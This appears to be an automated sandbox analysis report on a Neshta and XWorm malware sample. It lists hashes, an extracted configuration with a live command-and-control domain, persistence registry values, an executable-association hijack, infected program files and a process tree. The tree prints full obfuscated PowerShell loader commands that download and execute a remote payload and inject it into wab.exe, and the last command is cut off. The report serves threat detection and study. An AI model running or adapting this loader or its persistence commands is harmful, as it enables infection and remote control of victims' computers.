neshta | a4615f641630183fb06937c4f82fbdeb1f38a61b0cce7476a2c5df3aef749336

General

Target

1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe
Size

35KB
MD5

4e86daeb4a5259de4a75d2b4c5594b2d
SHA1

4b1a0ab2edec0db06ad74df5ebae90fa3ceb4d33
SHA256

a4615f641630183fb06937c4f82fbdeb1f38a61b0cce7476a2c5df3aef749336
SHA512

23362c22954daeb1bc7576bcccd87a786a0301957ff733064fe56f1b5c62eb19cfd35963b84a93e3ed8925cd3901a2e0d22947d76be4aa584893c5b9a4013e52
SSDEEP

384:ydvg9j00WbqxAMTayV5N+5maFZZL37WqpJm3/KNm0ns0VgtFMAmNLToZw/RZCvKt:y2B4QBTOl37Wn3CNUVFQ92/OMh+uvlC

Score

10^/10

neshta xworm persistence rat spyware trojan

Malware Config

Extracted

Family

xworm

Version

3.1

C2

mayxw9402.duckdns.org:9402

Mutex

ZyV5MqKosTk3Hzpr

Attributes

Install_directory
%AppData%
install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/5064-1-0x00000000005F0000-0x0000000000600000-memory.dmp	family_xworm

Neshta
Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.
persistence spyware neshta
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

35 4428 powershell.exe

flow	pid	process
35	4428	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 2 IoCs

Processes:

1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.lnk	1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.lnk	1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe

Modifies system executable filetype association 2 TTPs 1 IoCs
persistence

Modify Registry
T1112

Change Default File Association
T1546.001

Processes:

wab.exe

description ioc process

Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" wab.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"	wab.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Nonharmoniousness171% -w 1 $Acetonen=(Get-ItemProperty -Path 'HKCU:\\ledelsessystemets\\').Hovedstillingers;%Nonharmoniousness171% ($Acetonen)"	reg.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

wab.exe

pid process

3580 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

1756 powershell.exe
3580 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1756 set thread context of 3580 1756 powershell.exe wab.exe

pid	process
3580	wab.exe

pid	process
1756	powershell.exe
3580	wab.exe

description	pid	process	target process
PID 1756 set thread context of 3580	1756	powershell.exe	wab.exe

Drops file in Program Files directory 64 IoCs

Processes:

wab.exe

description	ioc	process
File opened for modification	C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jaureg.exe	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\msedge.exe	wab.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\wmpconfig.exe	wab.exe
File opened for modification	C:\PROGRA~2\WI8A19~1\ImagingDevices.exe	wab.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{61087~1\VCREDI~1.EXE	wab.exe
File opened for modification	C:\PROGRA~3\MICROS~1\CLICKT~1\{9AC08~1\INTEGR~1.EXE	wab.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{4D8DC~1\VC_RED~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROBR~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\BHO\IE_TO_~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\WINDOW~2\wabmig.exe	wab.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\wmplayer.exe	wab.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\wmprph.exe	wab.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\wmpshare.exe	wab.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{EF5AF~1\WINDOW~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroRd32.exe	wab.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\FULLTR~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\ADOBEA~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.151\GO664E~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\32BITM~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.151\GOBD5D~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\wmlaunch.exe	wab.exe
File opened for modification	C:\PROGRA~2\MOZILL~1\UNINST~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\LOGTRA~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\READER~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~4.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\ELEVAT~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\NOTIFI~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jusched.exe	wab.exe
File opened for modification	C:\PROGRA~2\INTERN~1\iexplore.exe	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~2.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MIA062~1.EXE	wab.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{63880~1\WINDOW~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\java.exe	wab.exe
File opened for modification	C:\PROGRA~2\INTERN~1\ielowutil.exe	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exe	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MID1AD~1.EXE	wab.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{33D1F~1\VCREDI~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaw.exe	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\MSEDGE~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MI9C33~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADOBEC~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\PWAHEL~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\PWAHEL~1.EXE	wab.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{EF6B0~1\VCREDI~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\64BITM~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\AdobeARM.exe	wab.exe
File opened for modification	C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaws.exe	wab.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{D87AE~1\WINDOW~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\COOKIE~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\IDENTI~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~3.EXE	wab.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\setup_wm.exe	wab.exe
File opened for modification	C:\PROGRA~3\Adobe\Setup\{AC76B~1\setup.exe	wab.exe
File opened for modification	C:\PROGRA~2\MOZILL~1\MAINTE~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroCEF\RdrCEF.exe	wab.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADelRCP.exe	wab.exe
File opened for modification	C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jucheck.exe	wab.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~3.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~2.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\WOW_HE~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE	wab.exe

Drops file in Windows directory 1 IoCs

Processes:

wab.exe

description ioc process

File opened for modification C:\Windows\svchost.com wab.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	ioc	process
File opened for modification	C:\Windows\svchost.com	wab.exe

Modifies registry class 2 IoCs

Processes:

1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exewab.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings	1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"	wab.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

4004 reg.exe

pid	process
4004	reg.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exepowershell.exepowershell.exe

pid	process
5064	1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe
4428	powershell.exe
4428	powershell.exe
1756	powershell.exe
1756	powershell.exe
1756	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

1756 powershell.exe

pid	process
1756	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	5064	1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe
Token: SeDebugPrivilege	4428	powershell.exe
Token: SeDebugPrivilege	1756	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe

pid process

5064 1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe

Suspicious use of WriteProcessMemory 23 IoCs

Processes:

1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exeWScript.exepowershell.exepowershell.exewab.execmd.exe

description	pid	process	target process
PID 5064 wrote to memory of 3212	5064	1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe	WScript.exe
PID 5064 wrote to memory of 3212	5064	1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe	WScript.exe
PID 3212 wrote to memory of 4428	3212	WScript.exe	powershell.exe
PID 3212 wrote to memory of 4428	3212	WScript.exe	powershell.exe
PID 4428 wrote to memory of 3252	4428	powershell.exe	cmd.exe
PID 4428 wrote to memory of 3252	4428	powershell.exe	cmd.exe
PID 4428 wrote to memory of 1756	4428	powershell.exe	powershell.exe
PID 4428 wrote to memory of 1756	4428	powershell.exe	powershell.exe
PID 4428 wrote to memory of 1756	4428	powershell.exe	powershell.exe
PID 1756 wrote to memory of 3656	1756	powershell.exe	cmd.exe
PID 1756 wrote to memory of 3656	1756	powershell.exe	cmd.exe
PID 1756 wrote to memory of 3656	1756	powershell.exe	cmd.exe
PID 1756 wrote to memory of 3580	1756	powershell.exe	wab.exe
PID 1756 wrote to memory of 3580	1756	powershell.exe	wab.exe
PID 1756 wrote to memory of 3580	1756	powershell.exe	wab.exe
PID 1756 wrote to memory of 3580	1756	powershell.exe	wab.exe
PID 1756 wrote to memory of 3580	1756	powershell.exe	wab.exe
PID 3580 wrote to memory of 4444	3580	wab.exe	cmd.exe
PID 3580 wrote to memory of 4444	3580	wab.exe	cmd.exe
PID 3580 wrote to memory of 4444	3580	wab.exe	cmd.exe
PID 4444 wrote to memory of 4004	4444	cmd.exe	reg.exe
PID 4444 wrote to memory of 4004	4444	cmd.exe	reg.exe
PID 4444 wrote to memory of 4004	4444	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe
"C:\Users\Admin\AppData\Local\Temp\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe"
1⤵
- Checks computer location settings
- Drops startup file
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5064

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xmwugm.vbs"
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3212

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Polytyped = 1;$Chylification253='Sub';$Chylification253+='strin';$Chylification253+='g';Function alcoholist($Perissodactylous181){$Midwestward=$Perissodactylous181.Length-$Polytyped;For($Interventionisme=5;$Interventionisme -lt $Midwestward;$Interventionisme+=6){$Prveballoner+=$Perissodactylous181.$Chylification253.Invoke( $Interventionisme, $Polytyped);}$Prveballoner;}function Compulsed($Unmurmuringly74){& ($Besindet) ($Unmurmuringly74);}$Deltidsarbejderes=alcoholist 'AdfrdMTick,o RuntzBo meiK.dgel,ricllco,naa.leje/Unstr5 Lyop.As.le0Fors, Hu tk(Pl ttWGravei.anknnUafkld DennoHelssw,ascisCaddi JestiNTrassTLugtf .ardi1Papsv0Ndudg.Bidra0Drift;Afsni eapaW AmpuiSubson Proc6 Doso4Tr,pl;S,oke OdontxExecu6Goggl4Sca.r;,agso Bi,cerLustfvShirt:gulso1Mon.c2Dales1 Note.Frpla0C nte)Efter kabakGProvieMacrocBortrkE.piroD,ocl/ H,lf2Forin0 Stab1Sybot0 j.mb0 Njag1Ry,de0Opdag1Wordm Pan,eFBestiistuder StakeSte mfPremioGua hxLoyal/Waitl1Re,li2Immig1 Stvn.Slang0 Suit ';$Tjekkoslovaks=alcoholist 'Lo,gsUOutblsNedb,eJulehrSvi e-TelefA M xigForsieRebr.nIsos.tCount ';$Ingester=alcoholist 'ReliehFrys,tParletTilskp IntrsTelef: Back/Prep./Gen,edFlskee Hjt,.Plagih .ndke U.ioaFiflel.ataetFejlthStemma Ube n TierdAvls wDam.se Rotulafmagl SusunForsaeakutbsMakefs Kj.rbI terlKrmmeoKneblg Elgk. LignzRemiga Hje,.Ben,oc SstroForham Jepp/tuttycGynaev Spdb/P uffTFredej HarreLlebrn SmaaeSinnesKo.ib.P.intrOptimagest,rRdder ';$Physicobiological=alcoholist 'Desil>Su.id ';$Besindet=alcoholist 'Un eritranseGluerxa ema ';$Partiapparat='Tylen';$Cobolkommandoen = alcoholist 'In ele.algfcMalkohEndocoUnsk. Bob e%,doriaHo.nipBerigpSkaffd SardaAntimt,niffaTilbe%forb \Car.ubBronteRoccehpneumi prain UnistUnac,. Fosts wee hUnanir Inte Br,e&Plast&Jungm Mus,ie EcumcDemerh Ves oL tin aut,dtBedla ';Compulsed (alcoholist 'P.eno$ Ermig Sto l PhleoSki,lbGlassa B tel Time:EfterA .sopnpuffeoSiv,ttHydriuSignasAmbus=Earta(SumpecrimndmBowpidTurgo Rumv,/Telegc Lund Ra.l$ SubdCnaturo BesnbThoraoSkiltlMrskbkForfroTarifm.lotsmMorakaSkrydn esildTilsuoIntr,eDramanDiony)Pahse ');Compulsed (alcoholist 'L.sse$Trnaag BrdrlCentroParthbSkrida myxol Over: U,skSKanw.kNegabo exosvS.rpae Ex,rrOblan=Ges,f$Dob eIInd tn C,apgFe,rieligamsLsnintFog,de,uxemrelect.ApplisSedimp UdgrlBanksiY,gintMonoc(Pseu $InddrPBrutthDuvetyPrefisMetati F decBakkeo.incsbForesi RenvoP,sfolMetadoFleetgIagtti GryrcAbandaPrivalDou.h)Amage ');$Ingester=$Skover[0];$Rejnhards= (alcoholist 's.otc$EmbrygEneullGrovvo Bowdbvurdeap ntol drib:Ghe.tD.narmyWithisHaptetKrum sM.lin= MajoNStarteC.vilwLrker-OpbygOb,rebb Hyd,jPre.ee .jercKorrit Trn, DimerSTribeyPimpes urntPrevieZ,omamGranu.zetacNColiaeBlephtSa.ro..nferWAdv,keSamirb Kvr,CIndkvlFa heibrnefeRegulnMenigt');$Rejnhards+=$Anotus[1];Compulsed ($Rejnhards);Compulsed (alcoholist 'Udrre$SkokkD MiggyBioscsDugwatStatesUb.ry.HjlpeHNoseaeConfeaSand dVrneteTrivirSend.s .eas[Sagso$GadedT,otpojU,caje Aba.k icrok vandohypers BejdlThumpoTaarevterriaFa,iakBr,tnsC.lur]Buksh= Ggle$ KampDIncone emopl DecatMongoiBazoodGldess Af.oaGr mmrMarqubBloodegeonijLixend StereTr,sarBananep,efesSprut ');$Necrologies=alcoholist ' Afsy$KlumpDHove y DriksSinditBa,ersd sko..emorDMorsooDioptwS rkenIflg,lAeggeoorgana Cou.dVideoFDimaniMoonslgrecieGyres(Aflbs$ AediI .ndinGodsvgBesk.e S,hlsHearttDat,beRaastrSkatt,.anef$Dvrg,CStra,h CrypiDybstlJurisi esvrfDetekr HealuJor,sgFirmatJe.hueInsp rSporanR deleephras Stik)under ';$Chilifrugternes=$Anotus[0];Compulsed (alcoholist 'Domin$ Photgmaanel PreroAsyn.b,rdaga.ebenlObad.: raisMRespiePe rtrIna.tg .lufe ,romnKatascAntyde A.ko= Rede(RegnsT,arkeePapulsChanct Ap l- Du.iPAfg.vaRadiot ishbhColou Sa.au$ ngreCValglhB nitiHa,ynlVermii.ejlbf Tr nrTava,u rovkgSkibitRegureGstesrMadssnUn.ire DesisCrust) Okia ');while (!$Mergence) {Compulsed (alcoholist ' ,ulp$ Sireg,ravel,pirioUnilobJordoaMineslDiplo: agaB FejlrCenoboBrevswApulinSouthnFrifue ,lies Spi,sHorne1Overd2Sy,hi5K ffe=Opp,s$SacchtAnemorPantouUndupe,mpre ') ;Compulsed $Necrologies;Compulsed (alcoholist 'FredeS BoxftUd rma Udsor Skr,tPres,-Pol.gSAfgaslPrel eMeroce MisapAgerh Carin4Comic ');Compulsed (alcoholist ' S il$.ettigHandllRelenoDriftbTaskmaafskilCit,r:Bge oMCon eeVrng,r hartgTilkoeSprlln UdskcHy,pee ,her=Broek(BludgTNoncoeBrugesGym.ot ,egn-premoPlysteaGrofttInkomhFarve Ramad$MelinCOmegnhExtr icharml Sha.iKorrefMecharBrumbuD,lesgImportafsaaeKristrTan.hnYelleeKrystsenden)Decis ') ;Compulsed (alcoholist 'Count$C thogR odilInitioHyldebLo.enaFest.lRanin:Im.unUHighbnHom gmBrod.e nbeadPoet,iblodscRigsaiUnrefnMar eaProgrlRimta=Obsti$L.nglg.dsaglcertioR darb FantaPerislKnobn:Tmrerf orcioBolomr,arunkReforoSw,gsnTilvetSelsko.rugtr Lufte In.ttPodge+ Fora+Sterl% S.ov$retveSSun.hk K,pioBeativ HoejePre trT ope.Midt.c K nno Con u Ove.nAntistDet,i ') ;$Ingester=$Skover[$Unmedicinal];}$Tash=309240;$Frugtsukkerets=29256;Compulsed (alcoholist 'Kinas$PrimagMeta lPneumoUpfrobTrikoaAtriulAutog: ,orfHUrb,teNedspmOrkano BlastYmpnir Ptero basipEndevhIsseseSkill Isoqu=,ende AgatGCheireKokettreada-KardsCKontioIn.cunW,vectStaaleAl.opnEricat p.es Sc,ll$HomesCPedogh Ha.diSyn.elP.ngeiSlfanf Helir.praau Consgs.pert,akkeeLum nr GratnDomajeNath,s Snel ');Compulsed (alcoholist 'Boble$PrecogS adel Cr.soSemanbDesoraSputtlTrigo:NatioMopve.e InfetCo,iiaAp.erlHa.pbsLa.tikLysteaHo chbinc.ee imancoachevekslsStere Delet=Bedca Unsha[.ydetSB,lllyIndissLedd.tB.gnie Eli mMisda.AdephCSpiraoSacchnPrer.v lageeAfstnrUendetProbl]Sport: R,ak:Pl,nsF Conkr Di,coLamiamUnderBKrickaForsksAc.dieRev s6Arsen4ByrliSSterotDietar Meetisyst.n,alengFrems(Skfte$BatalHA,lgseTaf,emAlib,oCha ttuns rrLkkero,yttep Un.ohReexaeSurp ) Klav ');Compulsed (alcoholist ' Tre.$SalvngN nvalBuffeoBhenvbKlassa Undelreg,d:SmaasWR.touhDagafe D tuyFil,deFogyiy,hill Sirre=act v Super[ Sho.SKendeyDenunsCaprytKontrePreanmsolv,.PadgeTGaarde Grafx W.urtSnder.Optr EElegyn VerdcOx daoFootsd AnsgiPeewen K psgF lke] Beta: bran:.alynAAlderS,ollyCIndleIBilioISlren.TreetG ParaeGo iottilliSca.iatOctaprPelariGae.tnNondegOver.(Enigm$F lmcMNoneneDi.uct .aliaDaginlConses,orgrk lan augrisb etaleObjeknContieH eresMo um) Syre ');Compulsed (alcoholist 'Sange$NonthgMi.tnl No coFou,ab Schaa Vrell V rm: chorEKons lEnn.svVa beiBargonSt reaPre.n=Medal$ DetaWMedlehSkdete.lethyKomiteFerskyH,dro.Mon.bsT,ansu ResebReinesRe.letFluesrDressiFlaglnTrencgIn.vi(,ancr$IndusTHome.aHderss.kifthLseti,Testu$ StamFTorskrDisseuJobbegB.sint,aaobsZymoluPerknkJ,hankAtomseT lpir CatheDefortRejeksAchro)Sanit ');Compulsed $Elvina;"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4428

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\behint.shr && echo t"
4⤵
PID:3252

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Polytyped = 1;$Chylification253='Sub';$Chylification253+='strin';$Chylification253+='g';Function alcoholist($Perissodactylous181){$Midwestward=$Perissodactylous181.Length-$Polytyped;For($Interventionisme=5;$Interventionisme -lt $Midwestward;$Interventionisme+=6){$Prveballoner+=$Perissodactylous181.$Chylification253.Invoke( $Interventionisme, $Polytyped);}$Prveballoner;}function Compulsed($Unmurmuringly74){& ($Besindet) ($Unmurmuringly74);}$Deltidsarbejderes=alcoholist 'AdfrdMTick,o RuntzBo meiK.dgel,ricllco,naa.leje/Unstr5 Lyop.As.le0Fors, Hu tk(Pl ttWGravei.anknnUafkld DennoHelssw,ascisCaddi JestiNTrassTLugtf .ardi1Papsv0Ndudg.Bidra0Drift;Afsni eapaW AmpuiSubson Proc6 Doso4Tr,pl;S,oke OdontxExecu6Goggl4Sca.r;,agso Bi,cerLustfvShirt:gulso1Mon.c2Dales1 Note.Frpla0C nte)Efter kabakGProvieMacrocBortrkE.piroD,ocl/ H,lf2Forin0 Stab1Sybot0 j.mb0 Njag1Ry,de0Opdag1Wordm Pan,eFBestiistuder StakeSte mfPremioGua hxLoyal/Waitl1Re,li2Immig1 Stvn.Slang0 Suit ';$Tjekkoslovaks=alcoholist 'Lo,gsUOutblsNedb,eJulehrSvi e-TelefA M xigForsieRebr.nIsos.tCount ';$Ingester=alcoholist 'ReliehFrys,tParletTilskp IntrsTelef: Back/Prep./Gen,edFlskee Hjt,.Plagih .ndke U.ioaFiflel.ataetFejlthStemma Ube n TierdAvls wDam.se Rotulafmagl SusunForsaeakutbsMakefs Kj.rbI terlKrmmeoKneblg Elgk. LignzRemiga Hje,.Ben,oc SstroForham Jepp/tuttycGynaev Spdb/P uffTFredej HarreLlebrn SmaaeSinnesKo.ib.P.intrOptimagest,rRdder ';$Physicobiological=alcoholist 'Desil>Su.id ';$Besindet=alcoholist 'Un eritranseGluerxa ema ';$Partiapparat='Tylen';$Cobolkommandoen = alcoholist 'In ele.algfcMalkohEndocoUnsk. Bob e%,doriaHo.nipBerigpSkaffd SardaAntimt,niffaTilbe%forb \Car.ubBronteRoccehpneumi prain UnistUnac,. Fosts wee hUnanir Inte Br,e&Plast&Jungm Mus,ie EcumcDemerh Ves oL tin aut,dtBedla ';Compulsed (alcoholist 'P.eno$ Ermig Sto l PhleoSki,lbGlassa B tel Time:EfterA .sopnpuffeoSiv,ttHydriuSignasAmbus=Earta(SumpecrimndmBowpidTurgo Rumv,/Telegc Lund Ra.l$ SubdCnaturo BesnbThoraoSkiltlMrskbkForfroTarifm.lotsmMorakaSkrydn esildTilsuoIntr,eDramanDiony)Pahse ');Compulsed (alcoholist 'L.sse$Trnaag BrdrlCentroParthbSkrida myxol Over: U,skSKanw.kNegabo exosvS.rpae Ex,rrOblan=Ges,f$Dob eIInd tn C,apgFe,rieligamsLsnintFog,de,uxemrelect.ApplisSedimp UdgrlBanksiY,gintMonoc(Pseu $InddrPBrutthDuvetyPrefisMetati F decBakkeo.incsbForesi RenvoP,sfolMetadoFleetgIagtti GryrcAbandaPrivalDou.h)Amage ');$Ingester=$Skover[0];$Rejnhards= (alcoholist 's.otc$EmbrygEneullGrovvo Bowdbvurdeap ntol drib:Ghe.tD.narmyWithisHaptetKrum sM.lin= MajoNStarteC.vilwLrker-OpbygOb,rebb Hyd,jPre.ee .jercKorrit Trn, DimerSTribeyPimpes urntPrevieZ,omamGranu.zetacNColiaeBlephtSa.ro..nferWAdv,keSamirb Kvr,CIndkvlFa heibrnefeRegulnMenigt');$Rejnhards+=$Anotus[1];Compulsed ($Rejnhards);Compulsed (alcoholist 'Udrre$SkokkD MiggyBioscsDugwatStatesUb.ry.HjlpeHNoseaeConfeaSand dVrneteTrivirSend.s .eas[Sagso$GadedT,otpojU,caje Aba.k icrok vandohypers BejdlThumpoTaarevterriaFa,iakBr,tnsC.lur]Buksh= Ggle$ KampDIncone emopl DecatMongoiBazoodGldess Af.oaGr mmrMarqubBloodegeonijLixend StereTr,sarBananep,efesSprut ');$Necrologies=alcoholist ' Afsy$KlumpDHove y DriksSinditBa,ersd sko..emorDMorsooDioptwS rkenIflg,lAeggeoorgana Cou.dVideoFDimaniMoonslgrecieGyres(Aflbs$ AediI .ndinGodsvgBesk.e S,hlsHearttDat,beRaastrSkatt,.anef$Dvrg,CStra,h CrypiDybstlJurisi esvrfDetekr HealuJor,sgFirmatJe.hueInsp rSporanR deleephras Stik)under ';$Chilifrugternes=$Anotus[0];Compulsed (alcoholist 'Domin$ Photgmaanel PreroAsyn.b,rdaga.ebenlObad.: raisMRespiePe rtrIna.tg .lufe ,romnKatascAntyde A.ko= Rede(RegnsT,arkeePapulsChanct Ap l- Du.iPAfg.vaRadiot ishbhColou Sa.au$ ngreCValglhB nitiHa,ynlVermii.ejlbf Tr nrTava,u rovkgSkibitRegureGstesrMadssnUn.ire DesisCrust) Okia ');while (!$Mergence) {Compulsed (alcoholist ' ,ulp$ 